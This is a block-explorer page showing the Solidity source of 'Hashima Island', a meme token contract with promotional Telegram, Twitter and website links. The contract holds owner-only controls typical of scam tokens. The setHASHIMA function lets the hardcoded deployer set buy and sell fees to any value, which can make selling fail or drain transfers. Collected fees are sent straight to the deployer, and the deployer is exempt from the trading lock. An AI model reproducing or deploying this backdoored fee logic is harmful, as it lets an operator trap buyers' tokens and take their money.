ETH Price: $2,705.45 (+7.51%)

Contract Diff Checker

Contract Name:
HashimaIsland

Contract Source Code:

File 1 of 1 : HashimaIsland

/**

Are you ready for the game of fear in the world of Hashima? Here, you need to figure everything out on your own, everything is in your hands. 

Summoning from the depths of ancient times, the dance of six 6s conjures the hidden symbols of satanic forces.

TELEGRAM: https://t.me/HashimaIslandPortal
TWITTER: https://twitter.com/HashimaETH
WEBSITE: https://hashimaisland.cfd

*/

// SPDX-License-Identifier: unlicense

pragma solidity =0.8.18;

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

}
interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}
 
contract HashimaIsland {
    mapping (address => uint256) public balanceOf;
    mapping (address => mapping (address => uint256)) public allowance;

    string public constant name = "Hashima Island";   
    string public constant symbol = "HASHIMA";   
    uint8 public constant decimals = 9;
    uint256 public constant totalSupply = 1_000_000 * 10**decimals;

    uint256 getCost = 2;
    uint256 spendCost = 2;
    uint256 constant swapAmount = totalSupply / 1000;
    uint256 constant maxWallet = 100 * totalSupply / 100;

    bool tradingOpened = false;
    bool swapping;

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    address immutable pair;
    address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(routerAddress);
    address payable constant deployer = payable(address(0x347934d1B01A03DE65C8dc1e4Cb89f7c4eD14fbB));

    constructor() {
        pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), ETH);
        balanceOf[msg.sender] = totalSupply;
        allowance[address(this)][routerAddress] = type(uint256).max;
        emit Transfer(address(0), msg.sender, totalSupply);
    }

    receive() external payable {}

    function approve(address spender, uint256 amount) external returns (bool){
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool){
        return _transfer(msg.sender, to, amount);
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool){
        allowance[from][msg.sender] -= amount;        
        return _transfer(from, to, amount);
    }

    function _transfer(address from, address to, uint256 amount) internal returns (bool){
        balanceOf[from] -= amount;

        if(from != deployer)
            require(tradingOpened);

        if(to != pair && to != deployer)
            require(balanceOf[to] + amount <= maxWallet);

        if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount){
            swapping = true;
            address[] memory path = new  address[](2);
            path[0] = address(this);
            path[1] = ETH;
            _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
                swapAmount,
                0,
                path,
                address(this),
                block.timestamp
            );
            deployer.transfer(address(this).balance);
            swapping = false;
        }

        if(from != address(this) && to != deployer){
            uint256 coinAmount = amount * (from == pair ? getCost : spendCost) / 100;
            amount -= coinAmount;
            balanceOf[address(this)] += coinAmount;
            emit Transfer(from, address(this), coinAmount);
        }
        balanceOf[to] += amount;
        emit Transfer(from, to, amount);
        return true;
    }

    function openTrading() external {
        require(msg.sender == deployer);
        tradingOpened = true;
    }

    function setHASHIMA(uint256 newGet, uint256 newSpend) external {
        if(msg.sender == deployer){
            getCost = newGet;
            spendCost = newSpend;
        }
        else{
            require(newGet < 10);
            require(newSpend < 10);
            revert();
        }
        
    }
}

Please enter a contract address above to load the contract details and source code.

Context size (optional):